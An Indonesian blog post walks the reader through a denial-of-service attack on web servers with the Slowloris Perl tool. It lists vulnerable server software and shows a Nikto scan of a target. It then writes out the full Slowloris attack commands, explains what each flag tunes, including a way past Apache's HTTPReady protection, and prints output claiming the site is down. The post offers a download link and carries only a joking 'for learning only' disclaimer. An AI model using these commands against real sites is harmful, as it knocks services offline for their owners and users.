Sabtu, 01 Desember 2012

Posted by nandoanggaraputra | File under : , ,
Do you like this post?
Slowloris ,
Adalah tools yang di buat dengan perl yang di pergunakan oleh lamer untuk melakukan serangan DOS ke HTTPD service ( apache ) pada port 80 secara random dan hebatnya lagi , tidak memerlukan bandwidth yang begitu besar.

Dampak Serangan Dos
-Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
-Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.


Biasa nya DB yang bisa di serang adalah :
-Apache 1.x
-Apache 2.x
-dhttpd
-GoAhead WebServer
-WebSense "block pages" ( Belum dicoba :D )
-Trapeze Wireless Web Portal ( Belum dicoba  )
-Verizon's MI424-WR FIOS Cable modem ( Belum dicoba  )
-Verizon's Motorola Set-Top Box (port 8082 and requires auth - ( Belum dicoba )
-BeeWare WAF ( Belum dicoba  )
-Deny All WAF ( Belum dicoba  )

Dan,pertanyaan nya bagaimana cara Scan DB target ?
gampang kok,kita tinggal scan aja :D

disini ane pake Nikto


./nikto.pl -host target.com

nah,udah ketauan kan DB site target :D


Setelah itu kita cari Limi Timeout yg sesuai dengan situs target , Baru langsung melakukan kegiatan Ritual ini ^ ^

perl slowloris.pl -dns target.com -port 80 -test

dan langsung dah kita Uji coba :

perl slowloris.pl -dns target.com -port 80 -timeout 500 -num 500 -tcpto 5 -httpready

keterangan :
* -dns : the target ( dapat berupa IP atau domain )
* -port : port yg di gunakan oleh webserver ( 80 )
* -timeout: nilai waktu delay timeout untuk setiap paket thread, penantian reacquiring ruang tcp di server. pada langkah pengetesan, Nilai ini diisi dengan flag -test
* -num : jumlah soket yang digunakan untuk mendapatkan koneksi.Biasanya server apache akan membutuhkan nilai antara 400-600 atau tergantung pada konfigurasi
* -tcpto : TCP Timeout.
* -httpready: HTTPReady di gunakan apache untuk buffer connections. attacker dapat melewati perlindungan ini dengan mengirimkan permintaan POST bukan GET atau HEAD.
Tunggu hingga bacaan :

                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Sending data.
Current stats:  Slowloris has now sent 99 packets successfully.
This thread now sleeping for 500 seconds...

Dan itu arti nya Site has beed Down ^ ^
dan saat site di buka di Web Browser,maka Reques timeout


Download Slowloris nya disini


Ok,sekian dari ane Clound
Perhatian : materi diatas hanya untuk meteri Pembelajaran, :D


Sumber

0 komentar:

Posting Komentar